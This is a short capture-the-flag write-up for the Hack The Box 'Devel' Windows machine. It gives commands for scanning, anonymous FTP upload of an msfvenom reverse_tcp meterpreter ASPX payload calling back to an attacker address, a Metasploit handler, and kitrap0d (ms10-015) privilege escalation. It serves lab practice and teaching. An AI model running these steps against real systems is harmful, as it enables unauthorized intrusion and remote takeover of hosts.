HTB | Devel

This is a Windows box. You can find it here.

Skill Learned

  • kitrap0d (ms10-015)

NMAP

IP: 10.10.10.5

nmap -sC -sV 10.10.10.5 -Pn -T5
nmap

Port 21

anonymous login is allowed

ftp 10.10.10.5

Found files

ftp files

Nothing interesting was found here

Port 80

port 80

Let's do gobuster

we found http://10.10.10.5/aspnet_client/system_web/

gobuster

Foothold & Priv Esc

FTP

try putting test.txt

ftp
/test.txt

Since there is asp, we make a payload for reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1234 -f aspx > devel.aspx
msfvenom

and put in the server via FTP

put devel.aspx
open msfconsole 
use multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost tun0 
set lport 1234 
set ExitOnSession false 
exploit -j

load the page http://10.10.10.5/devel.aspx and boom you have a session on our nc

running payload

and run use post/multi/recon/local_exploit_suggester

exploit suggester

on trying exploit/windows/local/ms10_015_kitrap0d I got the shell

shell

Fund user.txt

user.txt

Found root.txt

root.txt
PreviousIntroNextHTB | Chatterbox

Last updated